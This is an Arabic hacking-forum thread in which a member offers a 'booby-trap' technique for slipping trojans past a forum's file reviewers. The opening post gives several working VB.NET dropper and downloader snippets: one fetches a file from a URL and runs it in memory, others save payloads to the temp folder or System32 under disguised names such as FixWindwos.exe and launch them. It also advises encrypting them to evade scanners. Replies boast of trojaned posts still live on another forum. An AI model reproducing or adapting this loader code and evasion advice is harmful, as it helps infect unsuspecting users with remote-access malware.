1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
  3. الملاحظات
    عزيزي زائر حصرياً : التقنيات النهائية لإصتياد المواقع المٌصابة بثغرات الحقن يدوياً وألياً متابعة الموضوع
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Ahmed Ibrahim
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏18 سبتمبر 2015
    عدد المشاركات:
    114
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    البرمجه
    الإقامة:
    Egypt
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:

    [​IMG]
    سوف اطرح اليوم تلغيمه تتخطي اغلب الفاحصين

    :{2!}::{2!}::{2!}::{2!}::{2!}::{2!}::{2!}::{2!}:

    [​IMG]




    لا تطبق مثل الشرح بالظبط استخدم دونلودر وشفره وبالتاكيد سوف تتخطي الفاحص

    والتغليمه مجربه في منتدي مشهور جدا و تم تخطي فريق الفحص تبعه لا داعي لذكر اسمه

    [​IMG]

    :{14}: >>>>
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    <<<< :{14}:


    [​IMG]


    كود دونلود(يعمل من الذكره دون النزول عل الهارد ديسك)


    كود:
       Dim Web As New Net.WebClient
            Dim URL As String = "الرابط المباشر"
            Dim Memory As Byte() = Web.DownloadData(URL)
            Reflection.Assembly.Load(Memory).EntryPoint.Invoke(Nothing, Nothing)
    
    دونلود ينزل في تيمب ثم يشغل السيرفر


    كود:
    Dim web As New System.Net.WebClient
    web.DownloadFile("ربط الدونلود", Environ("tmp") & "/Updata.exe")
    shell(Environ("tmp") & "/Updata.exe")
    دونلودر ينزل في مكان تحدده انتا


    كود:
      Try
    
    
                Dim Ibrahim As String = "الرابط المباشر"
    
    
                Dim Ahmed As String = "C:\Windows\System32\FixWindwos.exe"
    
    
                My.Computer.Network.DownloadFile(Ibrahim, Ahmed)
    
    
                Process.Start(Ahmed)
    
    
            Catch AZ As Exception
    
    
            End Try

    تشغيل من الريسورس



    كود:
     Dim Ahmed As String = My.Computer.FileSystem.SpecialDirectories.Temp
        Dim ibrahim As String = Ahmed + "server.exe"
     
        IO.File.WriteAllBytes(ibrahim, My.Resources.server)
     
        Process.Start(ibrahim)




    [​IMG]

     
    جاري تحميل الصفحة...
  2. YàssînOo S-Hérô
    rank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏13 نوفمبر 2015
    عدد المشاركات:
    9
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows xp
    اللغة البرمجية:
    Perl
    رد: تليغمه احترفيه تتخطي الفاحصين

    هههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههه



    وش هآذ تسميه تخطي لفآحص ؟


    ماذآ بك :) يآ غلام مجرد داولدر اين لتخطي ؟
     
  3. Ahmed Ibrahim
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏18 سبتمبر 2015
    عدد المشاركات:
    114
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    البرمجه
    الإقامة:
    Egypt
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تليغمه احترفيه تتخطي الفاحصين


    والله تم تخطي به فريق فحص الديف بوينت


    لان الفحص يقراء الاكواد المهمه ولا يقراء اكواد ازاله السيرفر او اعادة تشغيله


    ما معني كلمة غلام ؟؟
     
  4. M o H a N a D
    DeveloPer Plus

    عضو منذ:
    ‏1 أغسطس 2015
    عدد المشاركات:
    231
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    50
    الجنس:
    ذكر
    الإقامة:
    عٍاٌلِـمِـ لِـاٌ يٌـسُكُنه غَيٌـرُيٌـ
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تليغمه احترفيه تتخطي الفاحصين

    اي بالفعل تم تخطي فاحصي الديف بوينت :d
     
  5. A-R
    Developer

    عضو منذ:
    ‏2 يوليو 2015
    عدد المشاركات:
    342
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    50
    الإقامة:
    العراق العظيم
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تليغمه احترفيه تتخطي الفاحصين

    هههههههههههههههههههههههه


    عاشت ايدك لعد مجرب تتخطى الفاحصين مال عراق تيم خلي يطلعولك الوحوش


    هههههههههههههههههههههههه​
     
  6. Ahmed Ibrahim
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏18 سبتمبر 2015
    عدد المشاركات:
    114
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    البرمجه
    الإقامة:
    Egypt
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تليغمه احترفيه تتخطي الفاحصين

    انا لا اجيد التغليم كثيرا لاكن التغليمه تم تطبيقه من احد اصدقائي عل فريق فحص الديف بوينت وتم التخكي بكل سهوله واعضاء من الفحص ردو في الموضوع وشكرو صاحب التلغيمه وبعد اسبوع صاحب التغليمه كشف التليغمه وانزل مقطع عل اليتيتوب
     
  7. Ahmed Ibrahim
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏18 سبتمبر 2015
    عدد المشاركات:
    114
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    البرمجه
    الإقامة:
    Egypt
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تليغمه احترفيه تتخطي الفاحصين


    ليس الذي في بالك فا الكلير رات ال5 كان الرابط موضوع بالخطاء والرابط محذوف من 2013 والمركز الذي كان عليه الرابط لا يقبل الحذف او استرجاع الملف


    فا التغليمه هذه كنت في دوده اسمه ويندوذ ورم (Windows Worm)
     
  8. A-R
    Developer

    عضو منذ:
    ‏2 يوليو 2015
    عدد المشاركات:
    342
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    50
    الإقامة:
    العراق العظيم
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تليغمه احترفيه تتخطي الفاحصين

    اخي الديف بونت مابية فاحصين كفائة لان اكثر التلغيمات الي موجودة على الديف بونت والحد الان موجودة مواضيع ملغمة او محد يعرفها ولا واحد كاشفها


    او الديف بونت موقع ايخاف من كلشي ولاثبات على كلامي قافلين التسجيل ويفتحوة بالمناسبات فقط او لو موقع بية كفائة جان هسة مفتوح التسجيل او ميخافون من اي شي


    بس مع الاسف كم شخص كبر راس الديف بونت​
     
  9. Ahmed Ibrahim
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏18 سبتمبر 2015
    عدد المشاركات:
    114
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    البرمجه
    الإقامة:
    Egypt
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تليغمه احترفيه تتخطي الفاحصين

    اعرف يا صديقي والان يوجد 3 مواضيع ملغمه في الديف بوينت لاكن حرصا عل العضويات لان اذكر ما هي المواضع
     
  10. !_عبدالله عباس_!
    DeveloPer Plus

    عضو منذ:
    ‏13 نوفمبر 2015
    عدد المشاركات:
    412
    الإعجابات المتلقاة:
    382
    نقاط الجائزة:
    155
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    C#
    رد: تليغمه احترفيه تتخطي الفاحصين

    عاشت يدك حمودي
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...